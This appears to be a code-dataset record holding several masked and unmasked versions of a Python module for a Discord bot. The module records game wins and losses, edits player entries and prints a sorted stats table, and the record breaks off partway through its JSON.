space='spectral',\n colors='corr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',\n init_img=start)()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
<|reserved_special_token_0|>
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
float(rate[2])), reverse=True)
except ZeroDivisionError:
print(
'[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
pass
else:
print(
'[ERROR] Invalid sorting type specified. Displaying stats as stored'
)
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
playerString = ''
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace
)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str(float(winCount) / (float(winCount) + float(
loseCount)) * 100)
winRate = winRate[0:4].rjust(9)
playerString += (playerName + winCount + loseCount + winRate +
' %\n')
namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)
header = ' |' + 'Name'.center(namePaddingLen
) + '| Wins | Losses | Win Rate |\n'
divider = '-' * len(header) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
float(rate[2])), reverse=True)
except ZeroDivisionError:
print(
'[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
pass
else:
print(
'[ERROR] Invalid sorting type specified. Displaying stats as stored'
)
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
playerString = ''
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace
)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str(float(winCount) / (float(winCount) + float(
loseCount)) * 100)
winRate = winRate[0:4].rjust(9)
playerString += (playerName + winCount + loseCount + winRate +
' %\n')
namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)
header = ' |' + 'Name'.center(namePaddingLen
) + '| Wins | Losses | Win Rate |\n'
divider = '-' * len(header) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getIndex(name, searchList):
for i in range(0, len(searchList)):
if name in searchList[i]:
return i
return -1
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
float(rate[2])), reverse=True)
except ZeroDivisionError:
print(
'[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
pass
else:
print(
'[ERROR] Invalid sorting type specified. Displaying stats as stored'
)
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
playerString = ''
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace
)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str(float(winCount) / (float(winCount) + float(
loseCount)) * 100)
winRate = winRate[0:4].rjust(9)
playerString += (playerName + winCount + loseCount + winRate +
' %\n')
namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)
header = ' |' + 'Name'.center(namePaddingLen
) + '| Wins | Losses | Win Rate |\n'
divider = '-' * len(header) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
<|reserved_special_token_1|>
<|reserved_special_token_0|>
INFO_DB_SUCCESS = 'Database updated successfully!'
ERROR_DB_ERROR = 'Error: Unable to open database for writing'
ERROR_DB_NOT_FOUND = (
'Error: Database for specified game does not exist. Check your spelling or use !addgame first.'
)
ERROR_PLAYER_NOT_FOUND = (
'Error: "%s" not found in database. Check your spelling or use !addplayer first.'
)
ERROR_WIN_IN_LOSE = 'Error: "%s" already specified as winner.'
ERROR_DUP_LOSER = 'Error: "%s" duplicated in losers list'
ERROR_IN_DB = 'Error: "%s" is already in the database'
ERROR_SORT_ERROR = """Error while sorting list. Make sure all players have at least one win or loss.
"""
ERROR_INVALID_SORT = (
'Error: Invalid sorting type. Displaying stats as stored.\n')
def getIndex(name, searchList):
for i in range(0, len(searchList)):
if name in searchList[i]:
return i
return -1
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - num % multiple)
return num
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
def incrementStats(msgChannel, statsFile, winner, losers):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
if getIndex(winner, rows) < 0:
print('[ERROR] Winner "%s" not found in database' % winner)
return ERROR_PLAYER_NOT_FOUND % winner
for loser in losers:
loserIndex = getIndex(loser, rows)
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return ERROR_WIN_IN_LOSE % loser
if loserIndex < 0:
print('[ERROR] Loser "%s" not found in database' % loser)
return ERROR_PLAYER_NOT_FOUND % loser
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return ERROR_DUP_LOSER % dupList
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] "%s" already in database' % player)
print('[INFO] Database not updated')
return ERROR_IN_DB % player
else:
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
if writeDB(statsFile, data.headers, rows):
print("[INFO] %s's data changed" % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] "%s" not found in database' % player)
print('[INFO] Database not updated')
return ERROR_PLAYER_NOT_FOUND % player
else:
del rows[playerIndex]
if writeDB(statsFile, data.headers, rows):
print('[INFO] "%s" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
data = readDB(statsFile)
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +
float(rate[2])), reverse=True)
except ZeroDivisionError:
print(
'[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
pass
else:
print(
'[ERROR] Invalid sorting type specified. Displaying stats as stored'
)
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
playerString = ''
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace
)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str(float(winCount) / (float(winCount) + float(
loseCount)) * 100)
winRate = winRate[0:4].rjust(9)
playerString += (playerName + winCount + loseCount + winRate +
' %\n')
namePaddingLen = roundMultiple(maxPlayerLen + 2, 2)
header = ' |' + 'Name'.center(namePaddingLen
) + '| Wins | Losses | Win Rate |\n'
divider = '-' * len(header) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
<|reserved_special_token_1|>
import discord
from collections import Counter
from db import readDB, writeDB
INFO_DB_SUCCESS = 'Database updated successfully!'
ERROR_DB_ERROR = 'Error: Unable to open database for writing'
ERROR_DB_NOT_FOUND = 'Error: Database for specified game does not exist. Check your spelling or use !addgame first.'
ERROR_PLAYER_NOT_FOUND = 'Error: \"%s\" not found in database. Check your spelling or use !addplayer first.'
ERROR_WIN_IN_LOSE = 'Error: \"%s\" already specified as winner.'
ERROR_DUP_LOSER = 'Error: \"%s\" duplicated in losers list'
ERROR_IN_DB = 'Error: \"%s\" is already in the database'
ERROR_SORT_ERROR = 'Error while sorting list. Make sure all players have at least one win or loss.\n'
ERROR_INVALID_SORT = 'Error: Invalid sorting type. Displaying stats as stored.\n'
# desc: function to search a list of lists for a name
# args: name - the name to search the lists for
# searchList - a list of lists to search for a name
# retn: the index of the list containing the name or -1 if not found
def getIndex(name, searchList):
for i in range(0, len(searchList)):
if name in searchList[i]:
return i
return -1
# desc: function to round a number up to a specific increment. for example,
# rounding 11 to the nearest multiple of 2 would result in 12
# args: num - the number to round up
# multiple - the increment to round to
# retn: the rounded number
def roundMultiple(num, multiple):
if num % multiple:
return num + (multiple - (num % multiple))
return num
# desc: function to find duplicate items in a list
# args: inputList - a list to search for duplicates
# retn: a list containing the duplicates
def findDuplicates(inputList):
dupList = [k for k, v in Counter(inputList).items() if v > 1]
return dupList
# desc: function to update the database
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# winner - a string containing the winner's name
# losers - a list of strings containing the losers' names
# retn: a string indicating success or failure
def incrementStats(msgChannel, statsFile, winner, losers):
# read the database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
# check if the winner is actually in the database
if getIndex(winner, rows) < 0:
print('[ERROR] Winner \"%s\" not found in database' % winner)
return (ERROR_PLAYER_NOT_FOUND % winner)
# check if losers are in database
for loser in losers:
# get loser index
loserIndex = getIndex(loser, rows)
# check against winner to see if the name was duplicated
if loser == winner:
print('[ERROR] Winner duplicated in losers field')
return (ERROR_WIN_IN_LOSE % loser)
# check if loser was not found in database
if loserIndex < 0:
print('[ERROR] Loser \"%s\" not found in database' % loser)
return (ERROR_PLAYER_NOT_FOUND % loser)
# check for duplicate losers
dupList = findDuplicates(losers)
if len(dupList) > 0:
print('[ERROR] Duplicate losers found')
return (ERROR_DUP_LOSER % dupList)
# update stats if we found the winner and all losers
# get index, get win count, increment and update
winnerIndex = getIndex(winner, rows)
winnerVal = int(rows[winnerIndex][1])
rows[winnerIndex][1] = str(winnerVal + 1)
# same as winner for each loser
for loser in losers:
loserIndex = getIndex(loser, rows)
loserVal = int(rows[loserIndex][2])
rows[loserIndex][2] = str(loserVal + 1)
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
# desc: function to add a player to the database or edit an existing player
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# player - the name of the player to either add to the db or edit
# editType - either 'ADD' or 'EDIT' or 'REMOVE' - sets type of change happening
# wins - the number of wins to assign the player
# losses - the number of losses to assign the player
# retn: a string indicating success or failure
def editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):
# open up the database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
playerIndex = getIndex(player, rows)
# check if player is already in database
if editType == 'ADD':
if playerIndex > -1:
print('[ERROR] \"%s\" already in database' % player)
print('[INFO] Database not updated')
return (ERROR_IN_DB % player)
else:
# add player to list and resort
rows.append([player, wins, losses])
rows.sort(key=lambda name: name[0].capitalize())
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
print('[INFO] \"%s\" added to database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'EDIT':
if playerIndex < 0:
print('[ERROR] \"%s\" not found in database' % player)
print('[INFO] Database not updated')
return (ERROR_PLAYER_NOT_FOUND % player)
else:
rows[playerIndex] = [rows[playerIndex][0], wins, losses]
# write the new data to the database file
if writeDB(statsFile, data.headers, rows):
print('[INFO] %s\'s data changed' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
elif editType == 'REMOVE':
if playerIndex < 0:
print('[ERROR] \"%s\" not found in database' % player)
print('[INFO] Database not updated')
return (ERROR_PLAYER_NOT_FOUND % player)
else:
# delete player from list
del(rows[playerIndex])
# write the new data to the database
if writeDB(statsFile, data.headers, rows):
print('[INFO] \"%s\" removed from database' % player)
return INFO_DB_SUCCESS
else:
print('[INFO] Database not updated')
return ERROR_DB_ERROR
# desc: function to display the stats
# args: msgChannel - the channel the invoking message was sent from
# statsFile - the name of the database file
# sortType - the order in which the results should be sorted.
# options are 'WINRATE', 'WINS', 'LOSSES', or 'NAME'.
# will revert to 'NAME' if invalid
# player - NOT IMPLEMENTED - the player to display stats for
# retn: a string formatted with the database stats
def dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):
# read database
data = readDB(statsFile)
# return an error if database not found
if data == 0:
return ERROR_DB_NOT_FOUND
rows = data.rows
print('[INFO] Sort type is %s' % sortType)
returnMsg = ''
if sortType == 'WINRATE' or sortType == 'NONE':
# sort data by win rate
try:
rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) + float(rate[2])), reverse=True)
except ZeroDivisionError:
print('[ERROR] Tried to divide by zero because of blank player data')
returnMsg = ERROR_SORT_ERROR
elif sortType == 'WINS':
# sort by number of wins and reverse so max is first
rows.sort(key=lambda wins: float(wins[1]), reverse=True)
elif sortType == 'LOSSES':
# sort by number of losses and reverse so max is first
rows.sort(key=lambda losses: float(losses[2]), reverse=True)
elif sortType == 'NAME':
# database is stored sorted by name so dont do anything
pass
else:
print('[ERROR] Invalid sorting type specified. Displaying stats as stored')
returnMsg = ERROR_INVALID_SORT
if player == 'ALL':
# get max player length
maxPlayerLen = 0
for player in rows:
if len(player[0]) > maxPlayerLen:
maxPlayerLen = len(player[0])
# construct a string with all the player info
playerString = ''
# adjust start spacing if player length is odd or even to align with pipe
startSpace = 4 if maxPlayerLen % 2 else 3
for player in rows:
playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace)
winCount = player[1].rjust(7)
loseCount = player[2].rjust(9)
# calculate win rate
if float(winCount) <= 0:
winRate = '0'
elif float(loseCount) <= 0:
winRate = ' 100'
else:
winRate = str((float(winCount) / (float(winCount) + float(loseCount))) * 100)
# truncate win rate and create string with player info
winRate = winRate[0:4].rjust(9)
playerString += playerName + winCount + loseCount + winRate + ' %\n'
# calculate padding for name field and create header final strings
namePaddingLen = roundMultiple((maxPlayerLen + 2), 2)
header = ' |' + 'Name'.center(namePaddingLen) + '| Wins | Losses | Win Rate |\n'
divider = ('-' * len(header)) + '\n'
sendString = '```md\n' + header + divider + playerString + '```'
# return the constructed string
if len(returnMsg) > 0:
returnMsg = returnMsg + sendString
return returnMsg
return sendString
|
flexible
|
{
"blob_id": "5869669f1e3f648c0ddc68683f0b1d2754b40169",
"index": 8714,
"step-1": "<mask token>\n\n\ndef roundMultiple(num, multiple):\n if num % multiple:\n return num + (multiple - num % multiple)\n return num\n\n\n<mask token>\n\n\ndef incrementStats(msgChannel, statsFile, winner, losers):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n if getIndex(winner, rows) < 0:\n print('[ERROR] Winner \"%s\" not found in database' % winner)\n return ERROR_PLAYER_NOT_FOUND % winner\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n if loser == winner:\n print('[ERROR] Winner duplicated in losers field')\n return ERROR_WIN_IN_LOSE % loser\n if loserIndex < 0:\n print('[ERROR] Loser \"%s\" not found in database' % loser)\n return ERROR_PLAYER_NOT_FOUND % loser\n dupList = findDuplicates(losers)\n if len(dupList) > 0:\n print('[ERROR] Duplicate losers found')\n return ERROR_DUP_LOSER % dupList\n winnerIndex = getIndex(winner, rows)\n winnerVal = int(rows[winnerIndex][1])\n rows[winnerIndex][1] = str(winnerVal + 1)\n for loser in losers:\n loserIndex = getIndex(loser, rows)\n loserVal = int(rows[loserIndex][2])\n rows[loserIndex][2] = str(loserVal + 1)\n if writeDB(statsFile, data.headers, rows):\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef editPlayer(msgChannel, statsFile, player, editType, wins='0', losses='0'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n playerIndex = getIndex(player, rows)\n if editType == 'ADD':\n if playerIndex > -1:\n print('[ERROR] \"%s\" already in database' % player)\n print('[INFO] Database not updated')\n return ERROR_IN_DB % player\n else:\n rows.append([player, wins, losses])\n rows.sort(key=lambda name: name[0].capitalize())\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" added to database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'EDIT':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n rows[playerIndex] = [rows[playerIndex][0], wins, losses]\n if writeDB(statsFile, data.headers, rows):\n print(\"[INFO] %s's data changed\" % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n elif editType == 'REMOVE':\n if playerIndex < 0:\n print('[ERROR] \"%s\" not found in database' % player)\n print('[INFO] Database not updated')\n return ERROR_PLAYER_NOT_FOUND % player\n else:\n del rows[playerIndex]\n if writeDB(statsFile, data.headers, rows):\n print('[INFO] \"%s\" removed from database' % player)\n return INFO_DB_SUCCESS\n else:\n print('[INFO] Database not updated')\n return ERROR_DB_ERROR\n\n\ndef dumpStats(msgChannel, statsFile, sortType='WINRATE', player='ALL'):\n data = readDB(statsFile)\n if data == 0:\n return ERROR_DB_NOT_FOUND\n rows = data.rows\n print('[INFO] Sort type is %s' % sortType)\n returnMsg = ''\n if sortType == 'WINRATE' or sortType == 'NONE':\n try:\n rows.sort(key=lambda rate: float(rate[1]) / (float(rate[1]) +\n float(rate[2])), reverse=True)\n except ZeroDivisionError:\n print(\n '[ERROR] Tried to divide by zero because of blank player data')\n returnMsg = ERROR_SORT_ERROR\n elif sortType == 'WINS':\n rows.sort(key=lambda wins: float(wins[1]), reverse=True)\n elif sortType == 'LOSSES':\n rows.sort(key=lambda losses: float(losses[2]), reverse=True)\n elif sortType == 'NAME':\n pass\n else:\n print(\n '[ERROR] Invalid sorting type specified. Displaying stats as stored'\n )\n returnMsg = ERROR_INVALID_SORT\n if player == 'ALL':\n maxPlayerLen = 0\n for player in rows:\n if len(player[0]) > maxPlayerLen:\n maxPlayerLen = len(player[0])\n playerString = ''\n startSpace = 4 if maxPlayerLen % 2 else 3\n for player in rows:\n playerName = player[0].capitalize().rjust(maxPlayerLen + startSpace\n )\n winCount = player[1].rjust(7)\n loseCount = player[2].rjust(9)\n if float(winCount) <= 0:\n winRate = '0'\n elif float(loseCount) <= 0:\n winRate = ' 100'\n else:\n winRate = str(float(winCount) / (float(winCount) + float(\n loseCount)) * 100)\n winRate = 